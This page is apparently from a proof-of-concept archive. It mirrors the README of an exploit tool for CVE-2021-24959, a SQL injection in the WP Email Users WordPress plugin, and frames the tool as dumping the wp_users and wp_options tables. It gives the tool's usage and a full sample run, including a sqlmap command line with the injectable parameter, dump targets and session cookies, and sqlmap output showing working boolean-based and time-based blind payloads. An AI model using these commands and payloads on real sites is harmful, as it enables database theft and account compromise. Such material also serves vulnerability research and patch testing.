Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-24959 PoC — WP Email Users <= 1.7.6 - Subscriber+ SQL Injection

Source
https://github.com/RandomRobbieBF/CVE-2021-24959
Associated Vulnerability
Title:WP Email Users <= 1.7.6 - Subscriber+ SQL Injection (CVE-2021-24959)
Description:The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.
Description
WP Email Users <= 1.7.6 - SQL Injection
Readme
# CVE-2021-24959

Description
---

The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.

```
CVE 	CVE-2021-24959
CVSS 	8.8 (High)
Publicly Published 	January 31, 2022
Last Updated 	January 22, 2024
Researcher 	Krzysztof Zając - CERT PL
```

This tool will dump wp_users and wp_options.


How to use
---


```
usage: CVE-2021-24959.py [-h] -u URL [-un USERNAME] [-p PASSWORD]

WP Email Users <= 1.7.6 - SQL Injection Description: CVE-2021-24959 The WP Email Users WordPress plugin through 1.7.6 does not escape the data_raw parameter in the
weu_selected_users_1 AJAX action, available to any authenticated users, allowing them to perform SQL injection attacks.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Website URL
  -un USERNAME, --username USERNAME
                        WordPress username
  -p PASSWORD, --password PASSWORD
                        WordPress password
```

POC
---

```
python3 CVE-2021-24959.py -u http://kubernetes.docker.internal -un user -p user
The plugin version is below 1.7.7.
The plugin version is 1.7.6
Vulnerability check: http://kubernetes.docker.internal
Logged in successfully.
Command Line: sqlmap.py -u "http://kubernetes.docker.internal/wp-admin/admin-ajax.php"  --data="data_raw%5B%5D=&action=weu_selected_users_1" --time-sec=10 --threads 4  --batch -p data_raw[] -T wp_users,wp_options --dump --referer="http://kubernetes.docker.internal/wp-admin/" --level 3 --risk 3  --technique=BT --dbms=mysql --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" --cookie "_lscache_vary=36193a4836ccd8886b480d97874c6e09; wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1727270083%7CypC9NnM7X9UHKJQQn6iQAMjiJuiEifptBohNqPTbX5s%7Cd4a37484820e7215c7d4f6e255c1f5204b49557392dc6368d7270784a63bdd9f; wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1727097284; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1727270083%7CypC9NnM7X9UHKJQQn6iQAMjiJuiEifptBohNqPTbX5s%7C296a7aa7ab54b062d71a4f60399e41643aba06b9b13ccbc4cdb13bf0b262a7a9; wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1727270083%7CypC9NnM7X9UHKJQQn6iQAMjiJuiEifptBohNqPTbX5s%7C296a7aa7ab54b062d71a4f60399e41643aba06b9b13ccbc4cdb13bf0b262a7a9"
___
__H__
___ ___[(]_____ ___ ___  {1.8.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 14:14:44 /2024-09-23/

[14:14:44] [WARNING] provided value for parameter 'data_raw[]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[14:14:44] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: data_raw[] (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: data_raw[]=-1975 OR 3344=3344&action=weu_selected_users_1

Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: data_raw[]=(CASE WHEN (8496=8496) THEN SLEEP(10) ELSE 8496 END)&action=weu_selected_users_1
---
[14:14:44] [INFO] testing MySQL
[14:14:44] [INFO] confirming MySQL
[14:14:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 9 (stretch)
web application technology: Apache 2.4.25, PHP 7.3.5
back-end DBMS: MySQL >= 5.0.0
[14:14:44] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[14:14:44] [INFO] fetching current database
[14:14:44] [INFO] retrieving the length of query output
[14:14:44] [INFO] resumed: 9
[14:14:44] [INFO] resumed: wordpress
[14:14:44] [INFO] fetching columns for table 'wp_users' in database 'wordpress'
```
File Snapshot

 [4.0K]  /data/pocs/cb74a6b3b1c8d9a4c79c2e67af33ce4220922b23
├── [4.6K]  CVE-2021-24959.py
└── [4.1K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →